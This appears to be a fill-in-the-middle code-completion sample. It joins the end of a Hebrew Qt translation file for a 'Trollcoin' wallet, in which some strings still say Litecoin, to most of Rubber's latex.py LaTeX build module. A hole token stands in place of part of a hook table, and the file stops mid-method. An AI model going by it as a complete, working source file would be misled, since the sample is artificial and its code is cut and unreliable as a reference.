<source>Unable to bind to %s on this computer (bind returned error %d, %s)</source>
<translation>לא מסוגל לקשור ל-%s במחשב זה (הקשירה החזירה שגיאה %d, %s)</translation>
</message>
<message>
<location line="-91"/>
<source>Connect through socks proxy</source>
<translation>התחבר דרך פרוקסי SOCKS</translation>
</message>
<message>
<location line="-10"/>
<source>Allow DNS lookups for -addnode, -seednode and -connect</source>
<translation>אפשר בדיקת DNS עבור -addnode, -seednode ו- -connect</translation>
</message>
<message>
<location line="+55"/>
<source>Loading addresses...</source>
<translation>טוען כתובות...</translation>
</message>
<message>
<location line="-35"/>
<source>Error loading wallet.dat: Wallet corrupted</source>
<translation>שגיאה בטעינת הקובץ wallet.dat: הארנק מושחת</translation>
</message>
<message>
<location line="+1"/>
<source>Error loading wallet.dat: Wallet requires newer version of Trollcoin</source>
<translation>שגיאה בטעינת הקובץ wallet.dat: הארנק דורש גרסה חדשה יותר של לייטקוין</translation>
</message>
<message>
<location line="+93"/>
<source>Wallet needed to be rewritten: restart Trollcoin to complete</source>
<translation>יש לכתוב מחדש את הארנק: אתחל את לייטקוין לסיום</translation>
</message>
<message>
<location line="-95"/>
<source>Error loading wallet.dat</source>
<translation>שגיאה בטעינת הקובץ wallet.dat</translation>
</message>
<message>
<location line="+28"/>
<source>Invalid -proxy address: '%s'</source>
<translation>כתובת -proxy לא תקינה: '%s'</translation>
</message>
<message>
<location line="+56"/>
<source>Unknown network specified in -onlynet: '%s'</source>
<translation>רשת לא ידועה צוינה ב- -onlynet: '%s'</translation>
</message>
<message>
<location line="-1"/>
<source>Unknown -socks proxy version requested: %i</source>
<translation>התבקשה גרסת פרוקסי -socks לא ידועה: %i</translation>
</message>
<message>
<location line="-96"/>
<source>Cannot resolve -bind address: '%s'</source>
<translation>לא מסוגל לפתור כתובת -bind: '%s'</translation>
</message>
<message>
<location line="+1"/>
<source>Cannot resolve -externalip address: '%s'</source>
<translation>לא מסוגל לפתור כתובת -externalip: '%s'</translation>
</message>
<message>
<location line="+44"/>
<source>Invalid amount for -paytxfee=<amount>: '%s'</source>
<translation>כמות לא תקינה עבור -paytxfee=<amount>: '%s'</translation>
</message>
<message>
<location line="+1"/>
<source>Invalid amount</source>
<translation>כמות לא תקינה</translation>
</message>
<message>
<location line="-6"/>
<source>Insufficient funds</source>
<translation>אין מספיק כספים</translation>
</message>
<message>
<location line="+10"/>
<source>Loading block index...</source>
<translation>טוען את אינדקס הבלוקים...</translation>
</message>
<message>
<location line="-57"/>
<source>Add a node to connect to and attempt to keep the connection open</source>
<translation>הוסף צומת להתחברות ונסה לשמור את החיבור פתוח</translation>
</message>
<message>
<location line="-25"/>
<source>Unable to bind to %s on this computer. Trollcoin is probably already running.</source>
<translation>לא ניתן לקשור ל-%s במחשב זה. לייטקוין כנראה עדיין רץ.</translation>
</message>
<message>
<location line="+64"/>
<source>Fee per KB to add to transactions you send</source>
<translation>עמלה להוסיף לפעולות שאתה שולח עבור כל KB</translation>
</message>
<message>
<location line="+19"/>
<source>Loading wallet...</source>
<translation>טוען ארנק...</translation>
</message>
<message>
<location line="-52"/>
<source>Cannot downgrade wallet</source>
<translation>לא יכול להוריד דרגת הארנק</translation>
</message>
<message>
<location line="+3"/>
<source>Cannot write default address</source>
<translation>לא יכול לכתוב את כתובת ברירת המחדל</translation>
</message>
<message>
<location line="+64"/>
<source>Rescanning...</source>
<translation>סורק מחדש...</translation>
</message>
<message>
<location line="-57"/>
<source>Done loading</source>
<translation>טעינה הושלמה</translation>
</message>
<message>
<location line="+82"/>
<source>To use the %s option</source>
<translation>להשתמש באפשרות %s</translation>
</message>
<message>
<location line="-74"/>
<source>Error</source>
<translation>שגיאה</translation>
</message>
<message>
<location line="-31"/>
<source>You must set rpcpassword=<password> in the configuration file:
%s
If the file does not exist, create it with owner-readable-only file permissions.</source>
<translation>עליך לקבוע rpcpassword=yourpassword בקובץ ההגדרות:
%s
אם הקובץ אינו קיים, צור אותו עם הרשאות קריאה לבעלים בלבד.</translation>
</message>
</context>
</TS><|fim▁end|>
|
<message>
|
<|file_name|>latex.py<|end_file_name|><|fim▁begin|># This file is part of Rubber and thus covered by the GPL
# (c) Emmanuel Beffara, 2002--2006
"""
LaTeX document building system for Rubber.
This module contains all the code in Rubber that actually does the job of
building a LaTeX document from start to finish.
"""
import os, os.path, sys, imp
import re
import string
from rubber import _
from rubber.util import *
from rubber.depend import Node
from rubber.version import moddir
import rubber.latex_modules
from rubber.tex import Parser, EOF, OPEN, SPACE, END_LINE
#---- Module handler ----{{{1
class Modules:
"""
This class gathers all operations related to the management of modules.
The modules are searched for first in the current directory, then as
scripts in the 'modules' directory in the program's data directort, then
as a Python module in the package `rubber.latex'.
"""
def __init__ (self, env):
self.env = env
self.objects = {}
self.commands = {}
def __getitem__ (self, name):
"""
Return the module object of the given name.
"""
return self.objects[name]
def has_key (self, name):
"""
Check if a given module is loaded.
"""
return self.objects.has_key(name)
def register (self, name, dict={}):
"""
Attempt to register a module with the specified name. If the module is
already loaded, do nothing. If it is found and not yet loaded, then
load it, initialise it (using the context passed as optional argument)
and run any delayed commands for it.
"""
if self.has_key(name):
msg.debug(_("module %s already registered") % name, pkg='latex')
return 2
# First look for a script
mod = None
for path in "", os.path.join(moddir, "modules"):
file = os.path.join(path, name + ".rub")
if os.path.exists(file):
mod = ScriptModule(self.env, file)
msg.log(_("script module %s registered") % name, pkg='latex')
break
# Then look for a Python module
if not mod:
try:
file, path, descr = imp.find_module(name,
rubber.latex_modules.__path__)
pymodule = imp.load_module(name, file, path, descr)
file.close()
mod = PyModule(self.env, pymodule, dict)
msg.log(_("built-in module %s registered") % name, pkg='latex')
except ImportError:
msg.debug(_("no support found for %s") % name, pkg='latex')
return 0
# Run any delayed commands.
if self.commands.has_key(name):
for (cmd, args, vars) in self.commands[name]:
msg.push_pos(vars)
try:
# put the variables as they were when the directive was
# found
saved_vars = self.env.vars
self.env.vars = vars
try:
# call the command
mod.command(cmd, args)
finally:
# restore the variables to their current state
self.env.vars = saved_vars
except AttributeError:
msg.warn(_("unknown directive '%s.%s'") % (name, cmd))
except TypeError:
msg.warn(_("wrong syntax for '%s.%s'") % (name, cmd))
msg.pop_pos()
del self.commands[name]
self.objects[name] = mod
return 1
def command (self, mod, cmd, args):
"""
Send a command to a particular module. If this module is not loaded,
store the command so that it will be sent when the module is register.
"""
if self.objects.has_key(mod):
self.objects[mod].command(cmd, args)
else:
if not self.commands.has_key(mod):
self.commands[mod] = []
self.commands[mod].append((cmd, args, self.env.vars))
#---- Log parser ----{{{1
re_loghead = re.compile("This is [0-9a-zA-Z-]*")
re_rerun = re.compile("LaTeX Warning:.*Rerun")
re_file = re.compile("(\\((?P<file>[^ \n\t(){}]*)|\\))")
re_badbox = re.compile(r"(Ov|Und)erfull \\[hv]box ")
re_line = re.compile(r"(l\.(?P<line>[0-9]+)( (?P<code>.*))?$|<\*>)")
re_cseq = re.compile(r".*(?P<seq>(\\|\.\.\.)[^ ]*) ?$")
re_macro = re.compile(r"^(?P<macro>\\.*) ->")
re_page = re.compile("\[(?P<num>[0-9]+)\]")
re_atline = re.compile(
"( detected| in paragraph)? at lines? (?P<line>[0-9]*)(--(?P<last>[0-9]*))?")
re_reference = re.compile("LaTeX Warning: Reference `(?P<ref>.*)' \
on page (?P<page>[0-9]*) undefined on input line (?P<line>[0-9]*)\\.$")
re_label = re.compile("LaTeX Warning: (?P<text>Label .*)$")
re_warning = re.compile(
"(LaTeX|Package)( (?P<pkg>.*))? Warning: (?P<text>.*)$")
re_online = re.compile("(; reported)? on input line (?P<line>[0-9]*)")
re_ignored = re.compile("; all text was ignored after line (?P<line>[0-9]*).$")
class LogCheck (object):
"""
This class performs all the extraction of information from the log file.
For efficiency, the instances contain the whole file as a list of strings
so that it can be read several times with no disk access.
"""
#-- Initialization {{{2
def __init__ (self):
self.lines = None
def read (self, name):
"""
Read the specified log file, checking that it was produced by the
right compiler. Returns true if the log file is invalid or does not
exist.
"""
self.lines = None
try:
file = open(name)
except IOError:
return 2
line = file.readline()
if not line:
file.close()
return 1
if not re_loghead.match(line):
file.close()
return 1
self.lines = file.readlines()
file.close()
return 0
#-- Process information {{{2
def errors (self):
"""
Returns true if there was an error during the compilation.
"""
skipping = 0
for line in self.lines:
if line.strip() == "":
skipping = 0
continue
if skipping:
continue
m = re_badbox.match(line)
if m:
skipping = 1
continue
if line[0] == "!":
# We check for the substring "pdfTeX warning" because pdfTeX
# sometimes issues warnings (like undefined references) in the
# form of errors...
if string.find(line, "pdfTeX warning") == -1:
return 1
return 0
def run_needed (self):
"""
Returns true if LaTeX indicated that another compilation is needed.
"""
for line in self.lines:
if re_rerun.match(line):
return 1
return 0
#-- Information extraction {{{2
def continued (self, line):
"""
Check if a line in the log is continued on the next line. This is
needed because TeX breaks messages at 79 characters per line. We make
this into a method because the test is slightly different in Metapost.
"""
return len(line) == 79
def parse (self, errors=0, boxes=0, refs=0, warnings=0):
"""
Parse the log file for relevant information. The named arguments are
booleans that indicate which information should be extracted:
- errors: all errors
- boxes: bad boxes
- refs: warnings about references
- warnings: all other warnings
The function returns a generator. Each generated item is a dictionary
that contains (some of) the following entries:
- kind: the kind of information ("error", "box", "ref", "warning")
- text: the text of the error or warning
- code: the piece of code that caused an error
- file, line, last, pkg: as used by Message.format_pos.
"""
if not self.lines:
return
last_file = None
pos = [last_file]
page = 1
parsing = 0 # 1 if we are parsing an error's text
skipping = 0 # 1 if we are skipping text until an empty line
something = 0 # 1 if some error was found
prefix = None # the prefix for warning messages from packages
accu = "" # accumulated text from the previous line
macro = None # the macro in which the error occurs
cseqs = {} # undefined control sequences so far
for line in self.lines:
line = line[:-1] # remove the line feed
# TeX breaks messages at 79 characters, just to make parsing
# trickier...
if not parsing and self.continued(line):
accu += line
continue
line = accu + line
accu = ""
# Text that should be skipped (from bad box messages)
if prefix is None and line == "":
skipping = 0
continue
if skipping:
continue
# Errors (including aborted compilation)
if parsing:
if error == "Undefined control sequence.":
# This is a special case in order to report which control
# sequence is undefined.
m = re_cseq.match(line)
if m:
seq = m.group("seq")
if cseqs.has_key(seq):
error = None
else:
cseqs[seq] = None
error = "Undefined control sequence %s." % m.group("seq")
m = re_macro.match(line)
if m:
macro = m.group("macro")
m = re_line.match(line)
if m:
parsing = 0
skipping = 1
pdfTeX = string.find(line, "pdfTeX warning") != -1
if error is not None and ((pdfTeX and warnings) or (errors and not pdfTeX)):
if pdfTeX:
d = {
"kind": "warning",
"pkg": "pdfTeX",
"text": error[error.find(":")+2:]
}
else:
d = {
"kind": "error",
"text": error
}
d.update( m.groupdict() )
m = re_ignored.search(error)
if m:
d["file"] = last_file
if d.has_key("code"):
del d["code"]
d.update( m.groupdict() )
elif pos[-1] is None:
d["file"] = last_file
else:
d["file"] = pos[-1]
if macro is not None:
d["macro"] = macro
macro = None
yield d
elif line[0] == "!":
error = line[2:]
elif line[0:3] == "***":
parsing = 0
skipping = 1
if errors:
yield {
"kind": "abort",
"text": error,
"why" : line[4:],
"file": last_file
}
elif line[0:15] == "Type X to quit ":
parsing = 0
skipping = 0
if errors:
yield {
"kind": "error",
"text": error,
"file": pos[-1]
}
continue
if len(line) > 0 and line[0] == "!":
error = line[2:]
parsing = 1
continue
if line == "Runaway argument?":
error = line
parsing = 1
continue
# Long warnings
if prefix is not None:
if line[:len(prefix)] == prefix:
text.append(string.strip(line[len(prefix):]))
else:
text = " ".join(text)
m = re_online.search(text)
if m:
info["line"] = m.group("line")
text = text[:m.start()] + text[m.end():]
if warnings:
info["text"] = text
d = { "kind": "warning" }
d.update( info )
yield d
prefix = None
continue
# Undefined references
m = re_reference.match(line)
if m:
if refs:
d = {
"kind": "warning",
"text": _("Reference `%s' undefined.") % m.group("ref"),
"file": pos[-1]
}
d.update( m.groupdict() )
yield d
continue
m = re_label.match(line)
if m:
if refs:
d = {
"kind": "warning",
"file": pos[-1]
}
d.update( m.groupdict() )
yield d
continue
# Other warnings
if line.find("Warning") != -1:
m = re_warning.match(line)
if m:
info = m.groupdict()
info["file"] = pos[-1]
info["page"] = page
if info["pkg"] is None:
del info["pkg"]
prefix = ""
else:
prefix = ("(%s)" % info["pkg"])
prefix = prefix.ljust(m.start("text"))
text = [info["text"]]
continue
# Bad box messages
m = re_badbox.match(line)
if m:
if boxes:
mpos = { "file": pos[-1], "page": page }
m = re_atline.search(line)
if m:
md = m.groupdict()
for key in "line", "last":
if md[key]: mpos[key] = md[key]
line = line[:m.start()]
d = {
"kind": "warning",
"text": line
}
d.update( mpos )
yield d
skipping = 1
continue
# If there is no message, track source names and page numbers.
last_file = self.update_file(line, pos, last_file)
page = self.update_page(line, page)
def get_errors (self):
return self.parse(errors=1)
def get_boxes (self):
return self.parse(boxes=1)
def get_references (self):
return self.parse(refs=1)
def get_warnings (self):
return self.parse(warnings=1)
def update_file (self, line, stack, last):
"""
Parse the given line of log file for file openings and closings and
update the list `stack'. Newly opened files are at the end, therefore
stack[1] is the main source while stack[-1] is the current one. The
first element, stack[0], contains the value None for errors that may
happen outside the source. Return the last file from which text was
read (the new stack top, or the one before the last closing
parenthesis).
"""
m = re_file.search(line)
while m:
if line[m.start()] == '(':
last = m.group("file")
stack.append(last)
else:
last = stack[-1]
del stack[-1]
line = line[m.end():]
m = re_file.search(line)
return last
def update_page (self, line, before):
"""
Parse the given line and return the number of the page that is being
built after that line, assuming the current page before the line was
`before'.
"""
ms = re_page.findall(line)
if ms == []:
return before
return int(ms[-1]) + 1
#---- Parsing and compiling ----{{{1
re_command = re.compile("%[% ]*rubber: *(?P<cmd>[^ ]*) *(?P<arg>.*).*")
class SourceParser (Parser):
"""
Extends the general-purpose TeX parser to handle Rubber directives in the
comment lines.
"""
def __init__ (self, file, dep):
Parser.__init__(self, file)
self.latex_dep = dep
def read_line (self):
while Parser.read_line(self):
match = re_command.match(self.line.strip())
if match is None:
return True
vars = dict(self.latex_dep.vars.items())
vars['line'] = self.pos_line
args = parse_line(match.group("arg"), vars)
self.latex_dep.command(match.group("cmd"), args, vars)
return False
def skip_until (self, expr):
regexp = re.compile(expr)
while Parser.read_line(self):
match = regexp.match(self.line)
if match is None:
continue
self.line = self.line[match.end():]
self.pos_char += match.end()
return
class EndDocument:
""" This is the exception raised when \\end{document} is found. """
pass
class EndInput:
""" This is the exception raised when \\endinput is found. """
pass
class LaTeXDep (Node):
"""
This class represents dependency nodes for LaTeX compilation. It handles
the cyclic LaTeX compilation until a stable output, including actual
compilation (with a parametrable executable) and possible processing of
compilation results (e.g. running BibTeX).
Before building (or cleaning) the document, the method `parse' must be
called to load and configure all required modules. Text lines are read
from the files and parsed to extract LaTeX macro calls. When such a macro
is found, a handler is searched for in the `hooks' dictionary. Handlers
are called with one argument: the dictionary for the regular expression
that matches the macro call.
"""
#-- Initialization {{{2
def __init__ (self, env):
"""
Initialize the environment. This prepares the processing steps for the
given file (all steps are initialized empty) and sets the regular
expressions and the hook dictionary.
"""
Node.__init__(self, env.depends)
self.env = env
self.log = LogCheck()
self.modules = Modules(self)
self.vars = Variables(env.vars, {
"program": "latex",
"engine": "TeX",
"paper": "",
"arguments": [],
"src-specials": "",
"source": None,
"target": None,
"path": None,
"base": None,
"ext": None,
"job": None,
"graphics_suffixes" : [] })
self.vars_stack = []
self.cmdline = ["\\nonstopmode", "\\input{%s}"]
if self.vars.get('shell_escape', 0):
self.cmdline.insert(0, '--shell-escape')
# the initial hooks:
self.comment_mark = "%"
self.hooks = {
"begin": ("a", self.h_begin),
"end": ("a", self.h_end),
"pdfoutput": ("", self.h_pdfoutput),
"input" : ("", self.h_input),
"include" : ("a", self.h_include),
"includeonly": ("a", self.h_includeonly),
"usepackage" : ("oa", self.h_usepackage),
"RequirePackage" : ("oa", self.h_usepackage),
"documentclass" : ("oa", self.h_documentclass),
"LoadClass" : ("oa", self.h_documentclass),
"LoadClassWithOptions" : ("a", self.h_documentclass),
"tableofcontents" : ("", self.h_tableofcontents),
"listoffigures" : ("", self.h_listoffigures),<|fim▁hole|> "endinput" : ("", self.h_endinput)
}
self.begin_hooks = {
"verbatim": self.h_begin_verbatim,
"verbatim*": lambda loc: self.h_begin_verbatim(loc, env="verbatim\\*")
}
self.end_hooks = {
"document": self.h_end_document
}
self.hooks_changed = True
self.include_only = {}
# description of the building process:
self.aux_md5 = {}
self.aux_old = {}
self.watched_files = {}
self.onchange_md5 = {}
self.onchange_cmd = {}
self.removed_files = []
self.not_included = [] # dependencies that don't trigger latex
# state of the builder:
self.processed_sources = {}
self.must_compile = 0
self.something_done = 0
self.failed_module = None
def set_source (self, path, jobname=None):
"""
Specify the main source for the document. The exact path and file name
are determined, and the source building process is updated if needed,
according the the source file's extension. The optional argument
'jobname' can be used to specify the job name to something else that
the base of the file name.
"""
name = self.env.find_file(path, ".tex")
if not name:
msg.error(_("cannot find %s") % name)
return 1
self.reset_sources()
self.vars['source'] = name
(src_path, name) = os.path.split(name)
self.vars['path'] = src_path
(job, self.vars['ext']) = os.path.splitext(name)
if jobname is None:
self.set_job = 0
else:
self.set_job = 1
job = jobname
self.vars['job'] = job
if src_path == "":
src_path = "."
self.vars['base'] = job
else:
self.env.path.append(src_path)
self.vars['base'] = os.path.join(src_path, job)
source = self.source()
prefix = os.path.join(self.vars["cwd"], "")
if source[:len(prefix)] == prefix:
comp_name = source[len(prefix):]
else:
comp_name = source
if comp_name.find('"') >= 0:
msg.error(_("The filename contains \", latex cannot handle this."))
return 1
for c in " \n\t()":
if source.find(c) >= 0:
msg.warn(_("Source path uses special characters, error tracking might get confused."))
break
self.vars['target'] = self.target = os.path.join(prefix, job)
self.reset_products([self.target + ".dvi"])
return 0
def includeonly (self, files):
"""
Use partial compilation, by appending a call to \\inlcudeonly on the
command line on compilation.
"""
if self.vars["engine"] == "VTeX":
msg.error(_("I don't know how to do partial compilation on VTeX."))
return
if self.cmdline[-2][:13] == "\\includeonly{":
self.cmdline[-2] = "\\includeonly{" + ",".join(files) + "}"
else:
self.cmdline.insert(-1, "\\includeonly{" + ",".join(files) + "}")
for f in files:
self.include_only[f] = None
def source (self):
"""
Return the main source's complete filename.
"""
return self.vars['source']
def abspath (self, name, ref=None):
"""
Return the absolute path of a given filename. Relative paths are
considered relative to the file currently processed, the optional
argument "ref" can be used to override the reference file name.
"""
path = self.vars["cwd"]
if ref is None and self.vars.has_key("file"):
ref = self.vars["file"]
if ref is not None:
path = os.path.join(path, os.path.dirname(ref))
return os.path.abspath(os.path.join(path, os.path.expanduser(name)))
#-- LaTeX source parsing {{{2
def parse (self):
"""
Parse the source for packages and supported macros.
"""
try:
self.process(self.source())
except EndDocument:
pass
self.set_date()
msg.log(_("dependencies: %r") % self.sources, pkg='latex')
def parse_file (self, file):
"""
Process a LaTeX source. The file must be open, it is read to the end
calling the handlers for the macro calls. This recursively processes
the included sources.
"""
parser = SourceParser(file, self)
parser.set_hooks(self.hooks.keys())
self.hooks_changed = False
while True:
if self.hooks_changed:
parser.set_hooks(self.hooks.keys())
self.hooks_changed = False
token = parser.next_hook()
if token.cat == EOF:
break
format, function = self.hooks[token.val]
args = []
for arg in format:
if arg == 'a':
args.append(parser.get_argument_text())
elif arg == 'o':
args.append(parser.get_latex_optional_text())
self.parser = parser
self.vars['line'] = parser.pos_line
function(self.vars, *args)
def process (self, path):
"""
This method is called when an included file is processed. The argument
must be a valid file name.
"""
if self.processed_sources.has_key(path):
msg.debug(_("%s already parsed") % path, pkg='latex')
return
self.processed_sources[path] = None
if path not in self.sources:
self.add_source(path)
try:
saved_vars = self.vars
try:
msg.log(_("parsing %s") % path, pkg='latex')
self.vars = Variables(saved_vars,
{ "file": path, "line": None })
file = open(path)
try:
self.parse_file(file)
finally:
file.close()
finally:
self.vars = saved_vars
msg.debug(_("end of %s") % path, pkg='latex')
except EndInput:
pass
def input_file (self, name, loc={}):
"""
Treat the given name as a source file to be read. If this source can
be the result of some conversion, then the conversion is performed,
otherwise the source is parsed. The returned value is a couple
(name,dep) where `name' is the actual LaTeX source and `dep' is
its dependency node. The return value is (None,None) if the source
could neither be read nor built.
"""
if name.find("\\") >= 0 or name.find("#") >= 0:
return None, None
for path in self.env.path:
pname = os.path.join(path, name)
dep = self.env.convert(pname, suffixes=[".tex",""], context=self.vars)
if dep:
file = dep.products[0]
else:
file = self.env.find_file(name, ".tex")
if not file:
continue
dep = None
self.add_source(file)
if dep is None or dep.is_leaf():
self.process(file)
if dep is None:
return file, self.set[file]
else:
return file, dep
return None, None
#-- Directives {{{2
def command (self, cmd, args, pos=None):
"""
Execute the rubber command 'cmd' with arguments 'args'. This is called
when a command is found in the source file or in a configuration file.
A command name of the form 'foo.bar' is considered to be a command
'bar' for module 'foo'. The argument 'pos' describes the position
(file and line) where the command occurs.
"""
if pos is None:
pos = self.vars
# Calls to this method are actually translated into calls to "do_*"
# methods, except for calls to module directives.
lst = string.split(cmd, ".", 1)
#try:
if len(lst) > 1:
self.modules.command(lst[0], lst[1], args)
elif not hasattr(self, "do_" + cmd):
msg.warn(_("unknown directive '%s'") % cmd, **pos)
else:
msg.log(_("directive: %s") % ' '.join([cmd]+args), pkg='latex')
getattr(self, "do_" + cmd)(*args)
#except TypeError:
# msg.warn(_("wrong syntax for '%s'") % cmd, **pos)
def do_alias (self, name, val):
if self.hooks.has_key(val):
self.hooks[name] = self.hooks[val]
self.hooks_changed = True
def do_clean (self, *args):
for file in args:
self.removed_files.append(self.abspath(file))
def do_depend (self, *args):
for arg in args:
file = self.env.find_file(arg)
if file:
self.add_source(file)
else:
msg.warn(_("dependency '%s' not found") % arg, **self.vars)
def do_make (self, file, *args):
file = self.abspath(file)
vars = { "target": file }
while len(args) > 1:
if args[0] == "from":
vars["source"] = self.abspath(args[1])
elif args[0] == "with":
vars["name"] = args[1]
else:
break
args = args[2:]
if len(args) != 0:
msg.error(_("invalid syntax for 'make'"), **self.vars)
return
self.env.conv_set(file, vars)
def do_module (self, mod, opt=None):
dict = { 'arg': mod, 'opt': opt }
self.modules.register(mod, dict)
def do_onchange (self, file, cmd):
file = self.abspath(file)
self.onchange_cmd[file] = cmd
if os.path.exists(file):
self.onchange_md5[file] = md5_file(file)
else:
self.onchange_md5[file] = None
def do_paper (self, arg):
self.vars["paper"] = arg
def do_path (self, name):
self.env.path.append(self.abspath(name))
def do_read (self, name):
path = self.abspath(name)
self.push_vars(file=path, line=None)
try:
file = open(path)
lineno = 0
for line in file.readlines():
lineno += 1
line = line.strip()
if line == "" or line[0] == "%":
continue
self.vars["line"] = lineno
lst = parse_line(line, self.vars)
self.command(lst[0], lst[1:])
file.close()
except IOError:
msg.warn(_("cannot read option file %s") % name, **self.vars)
self.pop_vars()
def do_rules (self, file):
name = self.env.find_file(file)
if name is None:
msg.warn(_("cannot read rule file %s") % file, **self.vars)
else:
self.env.converter.read_ini(name)
def do_set (self, name, val):
try:
self.vars[name] = val
except KeyError:
msg.warn(_("unknown variable: %s") % name, **self.vars)
def do_setlist (self, name, *val):
try:
self.vars[name] = val
except KeyError:
msg.warn(_("unknown variable: %s") % name, **self.vars)
def do_watch (self, *args):
for arg in args:
self.watch_file(self.abspath(arg))
#-- Macro handling {{{2
def hook_macro (self, name, format, fun):
self.hooks[name] = (format, fun)
self.hooks_changed = True
def hook_begin (self, name, fun):
self.begin_hooks[name] = fun
def hook_end (self, name, fun):
self.end_hooks[name] = fun
# Now the macro handlers:
def h_begin (self, loc, env):
if self.begin_hooks.has_key(env):
self.begin_hooks[env](loc)
def h_end (self, loc, env):
if self.end_hooks.has_key(env):
self.end_hooks[env](loc)
def h_pdfoutput (self, loc):
"""
Called when \\pdfoutput is found. Tries to guess if it is a definition
that asks for the output to be in PDF or DVI.
"""
parser = self.parser
token = parser.get_token()
if token.raw == '=':
token2 = parser.get_token()
if token2.raw == '0':
mode = 0
elif token2.raw == '1':
mode = 1
else:
parser.put_token(token2)
return
elif token.raw == '0':
mode = 0
elif token.raw == '1':
mode = 1
else:
parser.put_token(token)
return
if mode == 0:
if 'pdftex' in self.modules:
self.modules['pdftex'].pymodule.mode_dvi()
else:
self.modules.register('pdftex', {'opt': 'dvi'})
else:
if 'pdftex' in self.modules:
self.modules['pdftex'].pymodule.mode_pdf()
else:
self.modules.register('pdftex')
def h_input (self, loc):
"""
Called when an \\input macro is found. This calls the `process' method
if the included file is found.
"""
token = self.parser.get_token()
if token.cat == OPEN:
file = self.parser.get_group_text()
else:
file = ""
while token.cat not in (EOF, SPACE, END_LINE):
file += token.raw
token = self.parser.get_token()
self.input_file(file, loc)
def h_include (self, loc, filename):
"""
Called when an \\include macro is found. This includes files into the
source in a way very similar to \\input, except that LaTeX also
creates .aux files for them, so we have to notice this.
"""
if self.include_only and not self.include_only.has_key(filename):
return
file, _ = self.input_file(filename, loc)
if file:
aux = filename + ".aux"
self.removed_files.append(aux)
self.aux_old[aux] = None
if os.path.exists(aux):
self.aux_md5[aux] = md5_file(aux)
else:
self.aux_md5[aux] = None
def h_includeonly (self, loc, files):
"""
Called when the macro \\includeonly is found, indicates the
comma-separated list of files that should be included, so that the
othe \\include are ignored.
"""
self.include_only = {}
for name in files.split(","):
name = name.strip()
if name != "":
self.include_only[name] = None
def h_documentclass (self, loc, opt, name):
"""
Called when the macro \\documentclass is found. It almost has the same
effect as `usepackage': if the source's directory contains the class
file, in which case this file is treated as an input, otherwise a
module is searched for to support the class.
"""
file = self.env.find_file(name + ".cls")
if file:
self.process(file)
else:
dict = Variables(self.vars, { 'opt': opt })
self.modules.register(name, dict)
def h_usepackage (self, loc, opt, names):
"""
Called when a \\usepackage macro is found. If there is a package in the
directory of the source file, then it is treated as an include file
unless there is a supporting module in the current directory,
otherwise it is treated as a package.
"""
for name in string.split(names, ","):
name = name.strip()
file = self.env.find_file(name + ".sty")
if file and not os.path.exists(name + ".py"):
self.process(file)
else:
dict = Variables(self.vars, { 'opt': opt })
self.modules.register(name, dict)
def h_tableofcontents (self, loc):
self.watch_file(self.target + ".toc")
def h_listoffigures (self, loc):
self.watch_file(self.target + ".lof")
def h_listoftables (self, loc):
self.watch_file(self.target + ".lot")
def h_bibliography (self, loc, names):
"""
Called when the macro \\bibliography is found. This method actually
registers the module bibtex (if not already done) and registers the
databases.
"""
self.modules.register("bibtex", dict)
# This registers the actual hooks, so that subsequent occurrences of
# \bibliography and \bibliographystyle will be caught by the module.
# However, the first time, we have to call the hooks from here. The
# line below assumes that the new hook has the same syntax.
self.hooks['bibliography'][1](loc, names)
def h_bibliographystyle (self, loc, name):
"""
Called when \\bibliographystyle is found. This registers the module
bibtex (if not already done) and calls the method set_style() of the
module.
"""
self.modules.register("bibtex", dict)
# The same remark as in 'h_bibliography' applies here.
self.hooks['bibliographystyle'][1](loc, name)
def h_begin_verbatim (self, dict, env="verbatim"):
"""
Called when \\begin{verbatim} is found. This disables all macro
handling and comment parsing until the end of the environment. The
optional argument 'end' specifies the end marker, by default it is
"\\end{verbatim}".
"""
self.parser.skip_until(r"[ \t]*\\end\{%s\}.*" % env)
def h_endinput (self, dict):
"""
Called when \\endinput is found. This stops the processing of the
current input file, thus ignoring any code that appears afterwards.
"""
raise EndInput
def h_end_document (self, dict):
"""
Called when \\end{document} is found. This stops the processing of any
input file, thus ignoring any code that appears afterwards.
"""
raise EndDocument
#-- Compilation steps {{{2
def compile (self):
"""
Run one LaTeX compilation on the source. Return true on success or
false if errors occured.
"""
msg.progress(_("compiling %s") % msg.simplify(self.source()))
file = self.source()
prefix = os.path.join(self.vars["cwd"], "")
if file[:len(prefix)] == prefix:
file = file[len(prefix):]
if file.find(" ") >= 0:
file = '"%s"' % file
cmd = [self.vars["program"]]
if self.set_job:
if self.vars["engine"] == "VTeX":
msg.error(_("I don't know how set the job name with %s.")
% self.vars["engine"])
else:
cmd.append("-jobname=" + self.vars["job"])
specials = self.vars["src-specials"]
if specials != "":
if self.vars["engine"] == "VTeX":
msg.warn(_("I don't know how to make source specials with %s.")
% self.vars["engine"])
self.vars["src-specials"] = ""
elif specials == "yes":
cmd.append("-src-specials")
else:
cmd.append("-src-specials=" + specials)
cmd += self.vars["arguments"]
cmd += [x.replace("%s",file) for x in self.cmdline]
# Remove the CWD from elements inthe path, to avoid potential problems
# with special characters if there are any (except that ':' in paths
# is not handled).
prefix = self.env.vars["cwd"]
prefix_ = os.path.join(prefix, "")
paths = []
for p in self.env.path:
if p == prefix:
paths.append(".")
elif p[:len(prefix_)] == prefix_:
paths.append("." + p[len(prefix):])
else:
paths.append(p)
inputs = string.join(paths, ":")
if inputs == "":
env = {}
else:
inputs = inputs + ":" + os.getenv("TEXINPUTS", "")
env = {"TEXINPUTS": inputs}
self.env.execute(cmd, env, kpse=1)
self.something_done = 1
if self.log.read(self.target + ".log"):
msg.error(_("Could not run %s.") % cmd[0])
return False
if self.log.errors():
return False
if not os.access(self.products[0], os.F_OK):
msg.error(_("Output file `%s' was not produced.") %
msg.simplify(self.products[0]))
return False
for aux, md5 in self.aux_md5.items():
self.aux_old[aux] = md5
self.aux_md5[aux] = md5_file(aux)
return True
def pre_compile (self, force):
"""
Prepare the source for compilation using package-specific functions.
This function must return False on failure. This function sets
`must_compile' to True if we already know that a compilation is
needed, because it may avoid some unnecessary preprocessing (e.g.
BibTeXing).
"""
aux = self.target + ".aux"
if os.path.exists(aux):
self.aux_md5[aux] = md5_file(aux)
else:
self.aux_md5[aux] = None
self.aux_old[aux] = None
self.log.read(self.target + ".log")
self.must_compile = force
self.must_compile = self.compile_needed()
msg.log(_("building additional files..."), pkg='latex')
for mod in self.modules.objects.values():
if not mod.pre_compile():
self.failed_module = mod
return False
return True
def post_compile (self):
"""
Run the package-specific operations that are to be performed after
each compilation of the main source. Returns true on success or false
on failure.
"""
msg.log(_("running post-compilation scripts..."), pkg='latex')
for file, md5 in self.onchange_md5.items():
